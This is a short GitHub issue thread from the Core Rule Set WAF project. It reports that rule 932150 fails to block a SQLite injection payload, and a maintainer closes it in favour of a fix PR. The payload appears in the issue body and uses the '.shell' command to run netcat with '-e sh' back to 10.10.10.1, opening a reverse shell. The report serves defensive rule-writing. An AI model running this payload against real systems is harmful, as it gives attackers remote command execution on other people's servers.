### ISSUE TITLE
Sqlite system command execution

### ISSUE THREAD

**Issue by flo405** [coreruleset/coreruleset#2031]
### Description

Payload: <b>";\n.shell nc 10.10.10.1 6666 -e sh\n</b>

This payload does not get blocked by rule 932150. 

You can find a vulnerable script and a similar payload [here](https://github.com/qxxxb/ctf/tree/master/2021/zer0pts_ctf/baby_sqli)

### Your Environment

* CRS version (e.g., v3.2.0): v3.3.0
* Paranoia level setting: 3
* ModSecurity version (e.g., 2.9.3): 2.9.3
* Web Server and version (e.g., apache 2.4.41): Apache 2.4.41
* Operating System and version: Ubuntu 20.04.2 LTS

### Confirmation

[x] I have removed any personal data (email addresses, IP addresses,
    passwords, domain names) from any logs posted.

**Comment by dune73** [comment]
Closing this in favor of PR #2032.
